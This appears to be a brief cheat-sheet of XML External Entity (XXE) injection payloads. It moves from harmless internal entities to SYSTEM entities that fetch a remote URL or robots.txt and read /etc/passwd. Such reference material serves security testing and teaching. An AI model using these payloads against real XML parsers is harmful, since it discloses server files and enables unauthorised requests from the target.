XML External Entity (XEE)
variables
<?xml version="1.0"?>
<!DOCTYPE root[
<!ENTITY myName "Michal">
<!ENTITY mySurname "Szalkowski">
]>
<root>
<text>&myName; &mySurname;</text>
</root>
webContent
<?xml version="1.0"?>
<!DOCTYPE root [ <!ENTITY webContent SYSTEM "http://log.michalszalkowski.com/lorem.txt">]>
<root>
<text>&webContent;</text>;
</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY webContent SYSTEM "robots.txt">]>
<root>
<text>&webContent;</text>;
</root>
fileContent
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY fileContent SYSTEM "/etc/passwd">]>
<root>&fileContent;</root>